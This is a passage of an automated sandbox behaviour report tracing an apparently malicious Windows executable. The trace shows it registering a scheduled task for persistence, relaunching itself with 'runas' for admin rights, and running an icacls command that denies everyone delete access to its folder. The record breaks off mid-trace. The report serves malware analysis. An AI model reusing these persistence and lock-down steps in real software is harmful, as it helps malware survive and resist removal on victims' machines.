(HeapHandle=0x4a00000, Flags=0x0, Size=0x24) returned 0x75ff030 [0108.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x75ff030, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0108.026] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xa0) returned 0x4a8fac0 [0108.026] GetLastError () returned 0x0 [0108.026] ITrigger:put_StartBoundary (This=0x6ca0e38, StartBoundary="2020-12-19T09:14:29") returned 0x0 [0108.026] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75c7710 | out: hHeap=0x4a00000) returned 1 [0108.026] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75e5350 | out: hHeap=0x4a00000) returned 1 [0108.026] IUnknown:Release (This=0x6ca0e38) returned 0x1 [0108.026] ITaskDefinition:get_Actions (in: This=0x6ca0b88, ppActions=0x18d840 | out: ppActions=0x18d840*=0x6ca0c00) returned 0x0 [0108.027] IActionCollection:Create (in: This=0x6ca0c00, Type=0, ppAction=0x18d82c | out: ppAction=0x18d82c*=0x6ca0ec0) returned 0x0 [0108.028] IUnknown:Release (This=0x6ca0c00) returned 0x1 [0108.028] IUnknown:QueryInterface (in: This=0x6ca0ec0, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18d848 | out: ppvObject=0x18d848*=0x6ca0ec0) returned 0x0 [0108.028] IUnknown:Release (This=0x6ca0ec0) returned 0x2 [0108.028] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xc) returned 0x75c7710 [0108.028] IExecAction:put_Path (This=0x6ca0ec0, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe") returned 0x0 [0108.028] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75c7710 | out: hHeap=0x4a00000) returned 1 [0108.028] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xc) returned 0x75c7710 [0108.028] IExecAction:put_Arguments (This=0x6ca0ec0, Arguments="--Task") returned 0x0 [0108.028] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75c7710 | out: hHeap=0x4a00000) returned 1 [0108.028] IUnknown:Release (This=0x6ca0ec0) returned 0x1 [0108.028] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xc) returned 0x75c7710 [0108.028] ITaskFolder:RegisterTaskDefinition (in: This=0x23ff98, Path="Time Trigger Task", pDefinition=0x6ca0b88, flags=6, UserId=0x18d2e8*(varType=0x0, wReserved1=0x75e, wReserved2=0xd7fc, wReserved3=0x18, varVal1=0x420cab, varVal2=0x4a00000), password=0x18d2f8*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), LogonType=3, sddl=0x18d30c*(varType=0x8, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1="", varVal2=0xd8), ppTask=0x18d814 | out: ppTask=0x18d814*=0x6ca0f30) returned 0x0 [0108.337] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75c7710 | out: hHeap=0x4a00000) returned 1 [0108.337] TaskScheduler:IUnknown:Release (This=0x23ff98) returned 0x0 [0108.337] TaskScheduler:IUnknown:Release (This=0x6ca0b88) returned 0x0 [0108.337] IUnknown:Release (This=0x6ca0f30) returned 0x0 [0108.337] CoUninitialize () [0108.344] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x757eae8 | out: hHeap=0x4a00000) returned 1 [0108.344] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x757e860 | out: hHeap=0x4a00000) returned 1 [0108.344] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x757e788 | out: hHeap=0x4a00000) returned 1 [0108.344] GetVersion () returned 0x1db10106 [0108.344] lstrcpyW (in: lpString1=0x18dc78, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0108.344] lstrcatW (in: lpString1="--Admin", lpString2=" IsNotAutoStart" | out: lpString1="--Admin IsNotAutoStart") returned="--Admin IsNotAutoStart" [0108.344] lstrcatW (in: lpString1="--Admin IsNotAutoStart", lpString2=" IsNotTask" | out: lpString1="--Admin IsNotAutoStart IsNotTask") returned="--Admin IsNotAutoStart IsNotTask" [0108.344] ShellExecuteExW (in: pExecInfo=0x18da3c*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18da3c*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0108.492] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75b9590 | out: hHeap=0x4a00000) returned 1 [0108.492] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x757e5d8 | out: hHeap=0x4a00000) returned 1 [0108.492] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75de5f0 | out: hHeap=0x4a00000) returned 1 [0108.493] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x4a48598 | out: hHeap=0x4a00000) returned 1 [0108.493] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x4a1dfa0 | out: hHeap=0x4a00000) returned 1 [0108.494] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75dedf8 | out: hHeap=0x4a00000) returned 1 [0108.494] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75ddcf8 | out: hHeap=0x4a00000) returned 1 [0108.494] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x4a21c30 | out: hHeap=0x4a00000) returned 1 [0108.495] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x4a205a0 | out: hHeap=0x4a00000) returned 1 [0108.495] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18ed04 | out: phModule=0x18ed04) returned 0 [0108.495] ExitProcess (uExitCode=0x0) [0108.498] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75ff000 | out: hHeap=0x4a00000) returned 1 [0108.498] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x4a1f1c8 | out: hHeap=0x4a00000) returned 1 [0108.573] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 2 os_tid = 0xac8 Thread: id = 3 os_tid = 0xa00 Thread: id = 4 os_tid = 0xb64 Thread: id = 5 os_tid = 0x600 Thread: id = 6 os_tid = 0x640 Thread: id = 7 os_tid = 0x5b8 Thread: id = 8 os_tid = 0x78c Thread: id = 23 os_tid = 0x998 Thread: id = 24 os_tid = 0x648 Thread: id = 83 os_tid = 0xa50 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 9 os_tid = 0x9ac Thread: id = 10 os_tid = 0x768 Thread: id = 11 os_tid = 0x764 Thread: id = 12 os_tid = 0x758 Thread: id = 13 os_tid = 0x724 Thread: id = 14 os_tid = 0x718 Thread: id = 15 os_tid = 0x714 Thread: id = 16 os_tid = 0x630 Thread: id = 17 os_tid = 0x154 Thread: id = 18 os_tid = 0x150 Thread: id = 19 os_tid = 0x120 Thread: id = 20 os_tid = 0x124 Thread: id = 21 os_tid = 0x118 Thread: id = 22 os_tid = 0xf0 Thread: id = 136 os_tid = 0xa94 Thread: id = 139 os_tid = 0x388 Thread: id = 140 os_tid = 0x964 Thread: id = 141 os_tid = 0xa24 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 25 os_tid = 0x3d4 Thread: id = 26 os_tid = 0x9fc Thread: id = 27 os_tid = 0x9dc Thread: id = 28 os_tid = 0x9cc Thread: id = 29 os_tid = 0x9bc Thread: id = 30 os_tid = 0x9a4 Thread: id = 31 os_tid = 0x994 Thread: id = 32 os_tid = 0x984 Thread: id = 33 os_tid = 0x974 Thread: id = 34 os_tid = 0x964 Thread: id = 35 os_tid = 0xb00 Thread: id = 36 os_tid = 0xaf0 Thread: id = 37 os_tid = 0xaa0 Thread: id = 38 os_tid = 0xaa4 Thread: id = 39 os_tid = 0x320 Thread: id = 40 os_tid = 0x6cc Thread: id = 41 os_tid = 0x42c Thread: id = 42 os_tid = 0x1e4 Thread: id = 43 os_tid = 0x760 Thread: id = 44 os_tid = 0x75c Thread: id = 45 os_tid = 0x74c Thread: id = 46 os_tid = 0x710 Thread: id = 47 os_tid = 0x6d0 Thread: id = 48 os_tid = 0x6bc Thread: id = 49 os_tid = 0x6b8 Thread: id = 50 os_tid = 0x6b0 Thread: id = 51 os_tid = 0x6a8 Thread: id = 52 os_tid = 0x69c Thread: id = 53 os_tid = 0x698 Thread: id = 54 os_tid = 0x684 Thread: id = 55 os_tid = 0x678 Thread: id = 56 os_tid = 0x4a8 Thread: id = 57 os_tid = 0x46c Thread: id = 58 os_tid = 0x44c Thread: id = 59 os_tid = 0x424 Thread: id = 60 os_tid = 0x420 Thread: id = 61 os_tid = 0x41c Thread: id = 62 os_tid = 0x404 Thread: id = 63 os_tid = 0x14c Thread: id = 64 os_tid = 0x158 Thread: id = 65 os_tid = 0x3fc Thread: id = 66 os_tid = 0x3f4 Thread: id = 67 os_tid = 0x3e8 Thread: id = 68 os_tid = 0x39c Thread: id = 69 os_tid = 0x390 Thread: id = 70 os_tid = 0x38c Thread: id = 71 os_tid = 0x388 Thread: id = 72 os_tid = 0x37c Thread: id = 73 os_tid = 0x374 Process: id = "4" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x36461000" os_pid = "0xaf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa94" cmd_line = "icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 74 os_tid = 0xadc Thread: id = 75 os_tid = 0xad0 Process: id = "5" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x76a3f000" os_pid = "0x588" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "1" os_parent_pid = "0x370" cmd_line = "taskeng.exe {4568F795-B030-4E70-B052-419BC1469E0B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 76 os_tid = 0x9d0 Thread: id = 77 os_tid = 0x64 Thread: id = 78 os_tid = 0x5b4 Thread: id = 79 os_tid = 0x5b0 Thread: id = 80 os_tid = 0x59c Thread: id = 81 os_tid = 0x594 Thread: id = 82 os_tid = 0x58c Thread: id = 118 os_tid = 0x704 Thread: id = 138 os_tid = 0x9f4 Process: id = "6" image_name = "oqrosnesyxcditex.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oqrosnesyxcditex.exe" page_root = "0x3671a000" os_pid = "0x34c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa94" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 84 os_tid = 0x324 [0109.564] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0109.565] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0109.565] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0109.565] GetProcAddress (hModule=0x76d30000, lpProcName="SetWaitableTimer") returned 0x76d6bb2f [0109.566] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0109.566] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleAliasesA") returned 0x76de6680 [0109.566] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0109.566] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0109.566] GetProcAddress (hModule=0x76d30000, lpProcName="GetVolumePathNamesForVolumeNameW") returned 0x76d50b26 [0109.566] GetProcAddress (hModule=0x76d30000, lpProcName="GetGeoInfoA") returned 0x76dd5272 [0109.566] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0109.566] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleOutputCharacterW") returned 0x76de714f [0109.566] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringA") returned 0x76d6bc39 [0109.566] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0109.567] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0109.567] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0109.567] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0109.567] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0109.567] GetProcAddress (hModule=0x76d30000, lpProcName="OpenEventW") returned 0x76d415d6 [0109.567] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfoExA") returned 0x76dd5a1f [0109.567] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0109.567] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeExA") returned 0x76d68266 [0109.567] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultCommConfigA") returned 0x76dc8009 [0109.567] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringA") returned 0x76d43c5a [0109.568] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0109.568] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0109.568] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0109.568] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0109.568] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoA") returned 0x76d40e00 [0109.568] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0109.568] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0109.568] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0109.568] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0109.568] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0109.568] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0109.569] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0109.569] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0109.569] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0109.569] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0109.569] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0109.569] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0109.569] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0109.569] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsA") returned 0x76d4e349 [0109.569] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStrings") returned 0x76d4e361 [0109.569] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0109.570] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0109.570] GetProcAddress (hModule=0x76d30000, lpProcName="SetHandleCount") returned 0x76d4cb29 [0109.570] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0109.570] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0109.570] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0109.570] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0109.570] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0109.570] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0109.570] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0109.570] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0109.570] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0109.570] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0109.570] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0109.570] GetProcAddress (hModule=0x76d30000, lpProcName="HeapCreate") returned 0x76d44a2d [0109.571] GetProcAddress (hModule=0x76d30000, lpProcName="HeapDestroy") returned 0x76d435b7 [0109.571] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0109.571] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0109.571] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0109.571] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0109.571] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0109.571] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0109.571] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0109.571] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0109.571] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedExchange") returned 0x76d41462 [0109.572] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0109.572] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0109.572] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0109.572] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0109.572] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0109.572] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0109.572] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0109.572] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0109.572] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0109.572] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0109.572] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0109.573] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0109.573] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0109.573] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0109.573] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0109.573] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0109.573] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0109.573] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0109.573] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleA") returned 0x76d412fc [0109.573] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleOutputCP") returned 0x76d59b0f [0109.573] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0109.573] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0109.573] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0109.573] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeA") returned 0x76d68266 [0109.574] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0109.574] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatA") returned 0x76d6a842 [0109.574] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatA") returned 0x76d6a959 [0109.574] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0109.574] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesA") returned 0x76d6287b [0109.574] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0109.574] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0109.574] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0109.574] GetProcAddress (hModule=0x770a0000, lpProcName="GetCharWidthFloatA") returned 0x770d8d09 [0109.574] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x75620000 [0109.574] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpCloseHandle") returned 0x75622c01 [0109.574] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0109.575] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0109.575] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xda973ca0, dwHighDateTime=0x1d6d58a)) [0109.575] GetCurrentProcessId () returned 0x34c [0109.575] GetCurrentThreadId () returned 0x324 [0109.575] GetTickCount () returned 0x114e022 [0109.575] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=22974863768) returned 1 [0109.575] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0109.575] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x4920000 [0109.576] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0109.576] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0109.576] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0109.576] GetProcAddress (hModule=0x76d30000, 